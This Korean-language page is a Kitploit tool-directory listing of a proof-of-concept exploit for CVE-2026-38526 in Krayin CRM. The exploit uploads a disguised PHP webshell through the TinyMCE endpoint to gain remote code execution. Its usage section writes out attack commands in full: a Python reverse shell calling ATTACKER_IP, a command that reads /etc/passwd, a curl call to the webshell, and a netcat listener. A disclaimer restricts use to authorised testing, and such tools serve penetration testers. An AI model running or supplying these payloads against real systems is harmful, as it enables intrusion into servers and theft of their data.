Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-CVE-2026-38526 — Automated exploit for Krayin CRM ≤ 2.2.x. | Kitploit
도구/GitHubGitHub/b0nyo/poc-cve-2026-38526
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

Automated exploit for Krayin CRM ≤ 2.2.x.

저장소 보기
1개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-38526 - Krayin CRM PHP 업로드 RCE

Krayin CRM ≤ 2.2.x용 자동 익스플로잇. 이 스크립트는 TinyMCE 엔드포인트(/admin/tinymce/upload)의 무제한 파일 업로드 취약점을 악용하여 image/jpeg로 위장해 MIME 유형 검증을 우회하고, PHP 웹쉘을 업로드한 후 웹 서버 권한으로 임의 명령을 실행합니다.


취약점 세부 정보

속성값
CVE IDCVE-2026-38526
영향받는 소프트웨어Krayin CRM ≤ 2.2.x
취약점 유형무제한 파일 업로드 → 원격 코드 실행
인증필요 (유효한 관리자 계정)
엔드포인트POST /admin/tinymce/upload

사전 요구 사항

  • Python 3.7+
  • 대상 Krayin CRM 인스턴스의 유효한 관리자 자격 증명
  • 대상 애플리케이션에 대한 네트워크 접근
  • requests 라이브러리

설치

root@kitploit:~
git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

사용법

root@kitploit:~
python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

인자

예시

root@kitploit:~
# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

익스플로잇 흐름

  1. 인증: 로그인 페이지에서 CSRF 토큰을 추출하고 제공된 자격 증명으로 인증
  2. 세션 검증: 인증된 대시보드에서 새 CSRF 토큰 추출
  3. 웹쉘 업로드: 스푸핑된 MIME 유형으로 /admin/tinymce/upload에 PHP 페이로드 업로드
  4. 명령 실행: 웹쉘 GET 매개변수를 통해 임의 명령 실행

샘플 출력

root@kitploit:~
[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

일반적인 문제

인증 실패: 자격 증명이 올바른지, 대상에 해당 계정이 존재하는지 확인하세요.

CSRF 토큰 추출 실패: 대상이 취약한 Krayin CRM을 실행 중이고 로그인 엔드포인트에 접근 가능한지 확인하세요.

리버스 셸 연결 안 됨: 리스너(nc -lvnp <PORT>)가 실행 중인지, 방화벽 규칙이 아웃바운드 연결을 허용하는지, 페이로드의 IP/포트가 올바른지 확인하세요.


면책 조항

이 도구는 공인된 보안 테스트 및 교육 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 사용자는 모든 대상 시스템을 테스트하기 전에 적절한 권한을 보유하고 있는지 확인할 책임이 전적으로 있습니다. 작성자는 이 도구로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.


참고 자료

  • TREXNEGRO 보안 권고 - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - 무제한 파일 업로드

작성자

b0nyo - PoC 구현

  • GitHub

TREXNEGRO - 취약점 발견

  • 보안 권고
도구 다운로드
플래그설명예시
-i대상 URL (http:// 포함 또는 제외)http://target.com 또는 target.com
-u관리자 이메일/사용자 이름[email protected]
-p관리자 비밀번호AdminPassword123!
-c실행할 명령 (기본값: id)whoami